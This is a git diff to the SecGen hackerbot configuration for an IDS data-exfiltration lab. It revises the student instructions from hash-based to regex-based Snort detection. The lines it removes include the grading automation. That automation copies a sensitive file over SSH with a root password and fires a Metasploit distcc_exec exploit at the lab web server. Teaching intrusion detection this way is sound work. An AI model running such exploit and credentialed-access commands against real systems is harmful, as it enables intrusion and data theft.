diff --git a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
index b8ca2b4ee..c173ec346 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
@@ -29,18 +29,10 @@
-
-
-
-
-
-
-
-
diff --git a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
index 3473eeedc..99eea0a60 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
@@ -14,12 +14,18 @@ Hint: you can include your sensitive data directly in a Snort rule. This is very
It is fine to monitor all ports, so long as your rule(s) detect transfer of the file.
-#### Hash-based exfiltration detection
+#### Regular expression-based exfiltration detection
-Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.
+Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain regular expressions to match against.
-It is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes, so that the Snort rule does not contain any plain text of your document.
+It is possible to write Snort rules that detect the transfer of the contents of your files, based on pattern matching, so that the Snort rule does not contain the sensitive parts of your document.
-Hint: consider using the protected\_content keyword in your rule.
+Hint: consider using the pcre keyword in your rule.
+
+> Side note: *Hash-based exfiltration detection*: **you don't need to use this for this lab.**
+
+> Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.
+
+> Using newer versions of Snort it is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes (using the protected\_content keyword), so that the Snort rule does not contain any plain text of your document.
---
\ No newline at end of file
diff --git a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
index 4f721a327..9cfe2d678 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
@@ -40,7 +40,7 @@
$sensitive_files_location = "/home/#{$main_user}/trade_secrets/"
- REQUIRED_FLAGS = 10
+ REQUIRED_FLAGS = 3
while $flags.length < REQUIRED_FLAGS
$flags << "flag{#{SecureRandom.hex}}"
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
@@ -167,51 +167,53 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
-
-<% $rand_alert1 = SecureRandom.hex(3) %>
-
-
- sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo --$?
-
- msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
-
- cat <%= $rand_tmp_restingplace %>; echo --$?
-
- sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/my.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$?
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
- Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".
+
-
- good_rule:1
- :( Couldn't find your snort rule on the IDS server in /etc/snort/rules/my.rules. You are missing *protected_content* matching or the message from your rule.
-
-
- triggered:1
- :( Your rule wasn't triggered.
-
-
- triggered:0.*good_rule:0
- :) Well done! <%= $flags.pop %>.
-
-
-
- -1
- :( Failed to ssh to the web server (<%= $web_server_ip %>)
-
-
- --1
- :( Failed to scp to the ids server (<%= $ids_server_ip %>)
-
-
- --0
- Continuing...
-
-
- :( Something was not quite right...
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
-
+
<% $rand_alert2 = SecureRandom.hex(3)
@@ -260,7 +262,7 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
- Where else is the sensitive data at rest? Use regexp searches to find the file (not hashes).
+ Where else is the sensitive data at rest across the various server VMs for the lab? Use regexp searches to find the file (don't use hashes).
<%= $rand_tmp_restingplace %>
:) <%= $flags.pop %>